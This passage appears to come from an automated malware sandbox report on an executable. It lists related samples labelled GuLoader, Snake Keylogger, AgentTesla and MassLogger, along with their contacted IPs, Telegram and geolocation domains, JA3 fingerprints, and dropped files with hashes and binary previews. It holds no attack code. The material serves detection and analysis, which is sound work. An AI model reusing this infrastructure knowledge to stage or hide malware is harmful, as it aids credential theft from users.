                                                                                                                                                        OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        TR3lYZyOE3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 158.101.44.242
                                                                                                                                                        mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 193.122.6.168
                                                                                                                                                        HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 193.122.130.0
                                                                                                                                                        4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        reallyfreegeoip.orgqUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.16.1
                                                                                                                                                        mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.16.1
                                                                                                                                                        4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.16.1
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        7l3CafRVv7.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        api.telegram.orgOeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        x8ggp1u7V8.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        ckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        PvAmrCZENy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        8JVG9KELay.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        HBL NO C-ACC-250002.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TELEGRAMRUOeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        x8ggp1u7V8.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        ckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        PvAmrCZENy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        8JVG9KELay.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        https://graph.org/WBACK-03-06?qb3nGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.99
                                                                                                                                                        CLOUDFLARENETUSlightijak2.1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 104.21.45.166
                                                                                                                                                        qUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        Checkpoint_News.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 1.1.1.1
                                                                                                                                                        EYv5BQ5NjI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 162.159.133.233
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.64.1
                                                                                                                                                        jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.16.1
                                                                                                                                                        x8ggp1u7V8.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 104.26.13.205
                                                                                                                                                        EYv5BQ5NjI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 162.159.129.233
                                                                                                                                                        CP07E1clp1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 104.21.112.1
                                                                                                                                                        UTMEMUSqUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        7l3CafRVv7.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        C6FGS0I3yn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        ckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        PvAmrCZENy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        jcHIuFAWdB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adqUG1ZROxLJ.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        jVE64QGXtK.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        HT4YGXBRtx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        UOEAjWmusE.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        4LJHFzA8jr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        7l3CafRVv7.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 104.21.80.1
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eOeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        EYv5BQ5NjI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        UFOiZapHGS.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        x8ggp1u7V8.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        XTN1VzRJZm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        EYv5BQ5NjI.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        XTN1VzRJZm.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        wubZB5Ar1r.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        yKRHzdeELv.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        mKRflLn5sx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 149.154.167.220
                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19OeM750ajqm.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        15Er6ACahF.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        uxeS0sMmqM.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        uxeS0sMmqM.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        JMgOcFOEZC.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        https://rea.grupolalegion.ec/p.php/1Get hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        SUPPLY ORDERS 934784.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        NEW PO.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193
                                                                                                                                                        MouseSpeedSetup64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 142.250.184.238
                                                                                                                                                        • 172.217.16.193

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dllPalledes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                          Balance Pendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                            Balance Pendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              Invoice Pending Payment.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                PRUEBA 2.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  KWbWCYe6LB.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                    DOCU800147001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                      #U8fdd#U89c4#U540d#U5355.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        hnTW5HdWvY.exeGet hashmaliciousAgentTesla, GuLoaderBrowse

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                          Entropy (8bit):0.8022071345173829
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAp:RJE+Lfki1GjHwU/+vVhWqp0
                                                                                                                                                                          MD5:2146989B77D73E05C835411EBFA4FE5F
                                                                                                                                                                          SHA1:BC386998B61637DFC5CADDE828CEA714631950DC
                                                                                                                                                                          SHA-256:FC6748B4DCAE295CAFB4E9694FAD59D342FB45148C92021F63106499FC2CB103
                                                                                                                                                                          SHA-512:CAF35E67D0A88461A1171359B6C49DFCC557C575E5E71A37F1AD8B47C58F291BEDF47AA37186A24DA42DDD7463614D49A0FB330BC7B1FC588792FF65048C4ECD
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x2747cbe0, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1048576
                                                                                                                                                                          Entropy (8bit):0.9433245826431736
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:bSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:bazaHvxXy2V2UR
                                                                                                                                                                          MD5:C0E5595441278AB36DFAD0A1E1A3598A
                                                                                                                                                                          SHA1:CA97B40860CFA70179E3F8946EA8182994931146
                                                                                                                                                                          SHA-256:9F5939579A3C84C1351A2C4ABE0D0CF6C61C0EAF084D7938D272FCFE2874C5F9
                                                                                                                                                                          SHA-512:2FE0FF94C1F0EB60D5C857603FD5D8ECCC9D9D17B2DBCF050D1E66DF67C8018E20E840B6550EFAD98240849DF6CC261874A9BC4D5ACA7595E5A059F5B422B978
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:'G..... ...............X\...;...{......................0.x...... ...{s......}..h.z.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{...................................i[......}..................r.d......}...........................#......h.z.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                          Entropy (8bit):0.08133975055093884
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:ZjN6YeODEwvll/nqlFcl1ZUllllmYxtillGBnX/l/Tj/k7/t:T6zoEall/qlFclQ/lbtG254
                                                                                                                                                                          MD5:74C6F40ED43B8A6D8CCDAE3A061D43FE
                                                                                                                                                                          SHA1:F3A4C2795C1A73AB82966687B97B6553BD62D646
                                                                                                                                                                          SHA-256:83505FF037EC7590427B12FC8B6F888C088C5DC3523607C5CBF623AEAEB3A3E0
                                                                                                                                                                          SHA-512:AD4631B1640B1D966949915CBA68A715FE925E819AB8510C68D3CE744DAB5E3AD6EDB65B78A059616FA9A1B0B63404BDF9286F73B39467BB2C5BAC0842E15EC1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:..Q.....................................;...{.......}... ...{s.......... ...{s.. ...{s.P.... ...{s.................r.d......}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):53158
                                                                                                                                                                          Entropy (8bit):5.062687652912555
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_525ficuo.rod.psm1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dco4scsh.to5.ps1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_llkhacce.1li.psm1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owqqsr40.mrb.ps1

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6656
                                                                                                                                                                          Entropy (8bit):5.028908901377071
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
                                                                                                                                                                          MD5:51E63A9C5D6D230EF1C421B2ECCD45DC
                                                                                                                                                                          SHA1:C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
                                                                                                                                                                          SHA-256:CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
                                                                                                                                                                          SHA-512:C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: Palledes.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Balance Pendiente.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Balance Pendiente.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: Invoice Pending Payment.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: PRUEBA 2.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: KWbWCYe6LB.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: DOCU800147001.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: #U8fdd#U89c4#U540d#U5355.exe, Detection: malicious, Browse
                                                                                                                                                                          • Filename: hnTW5HdWvY.exe, Detection: malicious, Browse
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....f.R...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (3179), with CRLF, LF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):56321
                                                                                                                                                                          Entropy (8bit):5.332263803827941
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:I7vv5vi05gFc7vwSFdRb4EyBadMcMd4RuVmjwOq:IJi0ZFbnKa2WuVmjwh
                                                                                                                                                                          MD5:730AEA65EF85239C2F02CE5C768B89AB
                                                                                                                                                                          SHA1:3B027D1151893B724F4EABA180835B69CE4DDF0F
                                                                                                                                                                          SHA-256:81422332F98FC6CABE9ED583CC587A255CBF105972F448ADC784D903FEDD052F
                                                                                                                                                                          SHA-512:778F570A96F64F5BA91E2C4D12BC54AE09227A22DAD2EF9ACE6D39E5C4AC64F7A83036AC07941A4D1C2BBEC74DBBEC924E9F74CF8BAA3F314328EEE4C6FCEE2C
                                                                                                                                                                          Malicious:false
